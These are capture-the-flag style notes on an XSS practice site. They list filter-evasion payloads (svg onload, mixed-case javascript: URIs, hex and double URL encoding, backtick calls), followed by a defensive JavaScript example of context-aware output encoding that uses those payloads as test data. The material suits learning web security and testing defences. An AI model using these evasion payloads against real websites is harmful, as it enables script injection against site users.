XSS Challenges from https://www.zixem.altervista.org/XSS
<svg/onload=alert()>
- WAF looking for "script"
<object data="javascRipt:alert()">
- %0A (LF = linefeed)
%0A<svg/onload=alert()>
- Inline html
x' onerror=javascript:alert()//
- param reflected in form post field (action)
XSS&action=javascript:alert(1337)
- Hex encoding (\x)
\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x29
- Double URL encoding
%253Csvg%2520onload%253Dalert%2528%2529%253E
- Escape the HTML tag with </p>
</p><svg/onload=alert()>
- Filters "("
');alert`1`;//
');/**/onerror=alert`1`//
');window[`alert`]`xss`//;
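
Each case above gets past a blacklist ("script", "(", a single decode pass), so the fix belongs at output, per context. The following is an added example, not code from the challenge site: it encodes the payloads listed in these notes for the HTML, URL-attribute and JS-string contexts. The function names and the app.invalid base URL are assumptions.

```javascript
// Added example: context-aware output encoding, exercised on payloads from these notes.
// Function names are hypothetical; they are not part of the challenge site.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Element body or quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// href / action / data attributes: allowlist the scheme after URL parsing, which
// lowercases the scheme and strips leading whitespace and control characters.
function safeUrl(value) {
  let parsed;
  try {
    parsed = new URL(String(value), 'https://app.invalid/'); // placeholder base URL
  } catch (e) {
    return '#';
  }
  return ['http:', 'https:'].includes(parsed.protocol) ? escapeHtml(value) : '#';
}

// String literal inside a <script> block: JSON-encode (escapes backslashes and
// double quotes), then replace HTML-significant characters with \uXXXX escapes.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&']/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Inputs copied from the notes above, used only as test data.
const SAMPLES = {
  html: ['<svg/onload=alert()>', '\n<svg/onload=alert()>', "x' onerror=javascript:alert()//",
    '</p><svg/onload=alert()>',
    // what an app sees if it URL-decodes the double-encoded input twice
    decodeURIComponent(decodeURIComponent('%253Csvg%2520onload%253Dalert%2528%2529%253E'))],
  url: ['javascRipt:alert()', 'javascript:alert(1337)'],
  js: ["');alert`1`;//", '\\x3c\\x73\\x76\\x67'], // second item: prefix of the hex payload
};

function encodeSamples() {
  return {
    html: SAMPLES.html.map(escapeHtml),
    url: SAMPLES.url.map(safeUrl),
    js: SAMPLES.js.map(jsStringLiteral),
  };
}

console.log(encodeSamples());
```

An inline event-handler attribute is both a JS and an HTML context, so a value placed there needs jsStringLiteral first and escapeHtml on the result.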